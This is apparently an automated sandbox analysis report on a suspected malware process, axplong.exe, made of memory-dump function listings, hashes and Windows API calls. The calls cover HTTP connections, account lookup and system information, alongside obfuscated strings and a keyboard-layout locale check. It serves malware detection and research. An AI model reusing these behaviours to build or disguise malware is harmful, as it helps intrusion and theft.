Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57b27d4f6c33679ad5d09ef20d656bc6f8e033132c5a47730199ecf673280fb
Instruction ID: 1020823b89914b00945ade84d9cf5e3f34a0a55c5cb7ddc7e17127b4aa22cad2
Opcode Fuzzy Hash: f57b27d4f6c33679ad5d09ef20d656bc6f8e033132c5a47730199ecf673280fb
Instruction Fuzzy Hash: A4F0FFB605C020AF916DDA43550DDBA3B6AE7CE330322A42BF6479E181D3242E099D24

Function 0514029C Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7adfba99538dadd571555360035404f4e39819daaa67a86e37c545076ab03b7d
Instruction ID: 8c2cd5bdbcca989687a46e757c75ffdbb1d96dfeb084695e2cfc8d4965cacb2b
Opcode Fuzzy Hash: 7adfba99538dadd571555360035404f4e39819daaa67a86e37c545076ab03b7d
Instruction Fuzzy Hash: E1F02BA719C420AFA559D543590CDFA3F36E7DE2303227517F242CE481D3546A0E9D71

Function 05140279 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d77433fecf8feebae40ef58d5554b60070b6ce609455dc15ca2f5f3483dec7e
Instruction ID: 0bdf8d3380ab91a3928bf4f29209af2b07715c3bd1546a6edce3c73310edc1cb
Opcode Fuzzy Hash: 0d77433fecf8feebae40ef58d5554b60070b6ce609455dc15ca2f5f3483dec7e
Instruction Fuzzy Hash: 55F024B715C128BF9119E583551DEFA6E6BABCE230362B427FB42EE481E3081D098D61

Function 051402B6 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df9bbf37da2eaf8a3b077a0bc67f753150ed77dc183080e437aa3afae2da213
Instruction ID: d6da8ef7168b1ae070d5ff616349858c2c2893ae7a867e418c18ad32402c2f98
Opcode Fuzzy Hash: 1df9bbf37da2eaf8a3b077a0bc67f753150ed77dc183080e437aa3afae2da213
Instruction Fuzzy Hash: 3EE0DFA6098431BF402AE583494DEBA7E6FABCE230362B016F203DC581A349680A9D30

Function 051402C5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b11893b899719c29541755ad8f7fd3f73c247bf0ca76b23157b2995ea395721
Instruction ID: 3d375b1426d9956675c83fa1f25060214cb5016e42d0f0ac93e242854189c836
Opcode Fuzzy Hash: 7b11893b899719c29541755ad8f7fd3f73c247bf0ca76b23157b2995ea395721
Instruction Fuzzy Hash: 1DE026D20880367F546AC093050CEF71E6F67CE6303727267B263AC4C2D348690B5830

Analysis Process: axplong.exePID: 3220, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	571
Total number of Limit Nodes:	34

Executed Functions

Function 0022BD60 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00278D70,00000000,00000000,00000000,00000000), ref: 0022BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0022BE11
HttpSendRequestA.WININET(?,00000000), ref: 0022BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0022BFCD
InternetCloseHandle.WININET(?), ref: 0022C0A7
InternetCloseHandle.WININET(?), ref: 0022C0AF
InternetCloseHandle.WININET(?), ref: 0022C0B7

Strings

8KG0fCKZFzY=, xrefs: 0022C385
8KG0fymoFx==, xrefs: 0022C2EB, 0022C543
stoi argument out of range, xrefs: 0022E3FA
RpKt, xrefs: 0022D516
RHYTYv==, xrefs: 0022BE33
invalid stoi argument, xrefs: 0022E404
d4(, xrefs: 0022E2FF

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$ConnectFileHttpOpenReadRequestSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4($invalid stoi argument$stoi argument out of range
API String ID: 3632815558-2609990668
Opcode ID: 404221dde121a0ec0e13540bbf803bb1c22b1ba9516a39e8ffbb4ab14bbb45de
Instruction ID: 2df86319e5bafba4d953f54cd336494646242990c042d3ca7d556aa0399f0350
Opcode Fuzzy Hash: 404221dde121a0ec0e13540bbf803bb1c22b1ba9516a39e8ffbb4ab14bbb45de
Instruction Fuzzy Hash: 45B108B0520128EBEB24DF68DC85BADBB79EF45304F604198F908972C1DB759AD4CF94

Function 002265B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00226650

Strings

IVKsgL==, xrefs: 002267A1
RBPleCSm, xrefs: 0022666C
GVQsgL==, xrefs: 002266F8

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 1484870144-3856690409
Opcode ID: 763c3535a9b4a9371259434acf08eb954019994fffd74d91f917f647304dc1ba
Instruction ID: 97872df36a25615ea71f6b5cc748decf08d1f28eeef1f96023a021922ee65566
Opcode Fuzzy Hash: 763c3535a9b4a9371259434acf08eb954019994fffd74d91f917f647304dc1ba
Instruction Fuzzy Hash: 5F9105B2910128ABDF28DF64DC89BEDB779EB45304F4041E9E50897281DA319FD8CFA4

Function 002346C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00237870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0023795C
Part of subcall function 00237870: __Cnd_destroy_in_situ.LIBCPMT ref: 00237968
Part of subcall function 00237870: __Mtx_destroy_in_situ.LIBCPMT ref: 00237971

Part of subcall function 0022BD60: InternetOpenW.WININET(00278D70,00000000,00000000,00000000,00000000), ref: 0022BDED
Part of subcall function 0022BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0022BE11

std::_Xinvalid_argument.LIBCPMT ref: 00234EA2

Strings

-(, xrefs: 00234F3A
KFT0PL==, xrefs: 002354B9
5F6, xrefs: 00235497
9KN6, xrefs: 00235351
9526, xrefs: 0023531D
fed3aa, xrefs: 00235489
6F9fr==, xrefs: 00234712
JB6, xrefs: 002353F5
WJP6, xrefs: 002353A3
Fz==, xrefs: 0023369E, 00234D2D
V0x6, xrefs: 0023541E
aqB6, xrefs: 002354DB
Vp 6, xrefs: 00235447
8ZF6, xrefs: 00235502
mP=, xrefs: 00236383, 00236652
stoi argument out of range, xrefs: 00234269, 00234EAC
MJB+, xrefs: 00234776, 002347ED, 00234A95, 00234B0C
246122658369, xrefs: 00234F4D, 00234F8F, 00234F99, 002354F4
aZT6, xrefs: 002353CC
V0N6, xrefs: 0023537A
96B6, xrefs: 00235470
MJF+, xrefs: 002347BD, 002348EC, 00234ADC, 00234C0B

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectMtx_destroy_in_situOpenXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-(
API String ID: 2549319220-1233442574
Opcode ID: 3e8eca159fc3de515e7f58508a20a16c1c69724e60a3cb6bedafa3a9e5cafc0b
Instruction ID: 4805becc479913f6f2f6252860d25341f7ffc28167bdcb0ac9c88e3bed06b265
Opcode Fuzzy Hash: 3e8eca159fc3de515e7f58508a20a16c1c69724e60a3cb6bedafa3a9e5cafc0b
Instruction Fuzzy Hash: AA2338B1D201589BEB19DB28CD4979DBB7A9F81304F5481D8E008AB2C6DB359FE4CF51

Function 00225DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Keyboard Layout\Preload, xrefs: 00225F64
0000043f, xrefs: 0022603B
00000422, xrefs: 00225FD9
00000419, xrefs: 00225FA8
00000423, xrefs: 0022600A

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: e2e48975e8dd3a82312bc31d134a03f101894e19b50e3c775e357873dc39833b
Instruction ID: 6c14e3fd38a2f26bca83b3a230c05584e715e3c5199a7f6af0c273b81fcc613b
Opcode Fuzzy Hash: e2e48975e8dd3a82312bc31d134a03f101894e19b50e3c775e357873dc39833b
Instruction Fuzzy Hash: 9FE18D71910228BBEB24DFA4CC8DBDEB779AB04304F5042D9E509A7291DB74ABD4CF91

Function 00227D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00227EA3

Strings

JmpxRL==, xrefs: 00228062
JmpyPb==, xrefs: 0022810A
JmpxQb==, xrefs: 002281B2

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 9a02ff9fb4cde298d9742c94ce83399e98ee5d2fdabf86d51327e9e3f698045b
Instruction ID: bd3796ca810e8cdeb4aad638d1430867371f10e037ea4e3701e8be885bd2e132
Opcode Fuzzy Hash: 9a02ff9fb4cde298d9742c94ce83399e98ee5d2fdabf86d51327e9e3f698045b
Instruction Fuzzy Hash: B9D11C70E25664E7DF14FBA8EC4A3AD7771AB42314F5042C8E805673C2DB758EA48BD2

Function 00256E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00256E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00256E7D
__dosmaperr.LIBCMT ref: 00256F12

Part of subcall function 00257177: __dosmaperr.LIBCMT ref: 002571AC

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 93b355d197c5429a27f20afc5ba650ff5921d5674354e8ea0c19549d09df3620
Instruction ID: dfd0cad78f285938cffaa4e9e82169396e5094c4b88c3a76d905e1bd6e32598d
Opcode Fuzzy Hash: 93b355d197c5429a27f20afc5ba650ff5921d5674354e8ea0c19549d09df3620
Instruction Fuzzy Hash: A8416D75920205ABDB24EFB5E8499AFBBF9EF58301B10442DF857D3610EA30A818CB25

Function 0025D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hpG%, xrefs: 0025D4FB

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: hpG%
API String ID: 0-2132501797
Opcode ID: 3afe949a7c24e1124eed90e84458ccd7348a2c5fa96bb878c2a71b43380296c3
Instruction ID: d0415259968f615b60b17e3b98106ca44ef00b4382e3826ec56f1477a34856a9
Opcode Fuzzy Hash: 3afe949a7c24e1124eed90e84458ccd7348a2c5fa96bb878c2a71b43380296c3
Instruction Fuzzy Hash: 94613432D302128BDF35DFA8E8856ADB7A0EB45317F644116EC48AB250E6309C2D8B59

Function 002282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00228454

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 1b0f16221bd5ed91eb2512e4c1eb0d3e6e79120844fe62ff9bbc28b6f0a29591
Instruction ID: fdc434f3d557d4b14e989062dc35e611f125dca6dd784c563c07f3a3ba576928
Opcode Fuzzy Hash: 1b0f16221bd5ed91eb2512e4c1eb0d3e6e79120844fe62ff9bbc28b6f0a29591
Instruction Fuzzy Hash: D7512B70D21229ABEB24FF64DC457EDB7759B45304F504298E804A72C1DF75DA90CB91

Function 00256C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30d73868db03f1ce69146765e5548889a8e240496fcf295520afb5897feb0ecf
Instruction ID: 66a63e35fb398d1342f213122694e67e63fb02754c606cba00e665308b552d9e
Opcode Fuzzy Hash: 30d73868db03f1ce69146765e5548889a8e240496fcf295520afb5897feb0ecf
Instruction Fuzzy Hash: 78213D729252047AEB117F64AC46BAF37399F4133AF600310FD343B1D0DB705D299AA9

Function 00256F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00256FB3

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
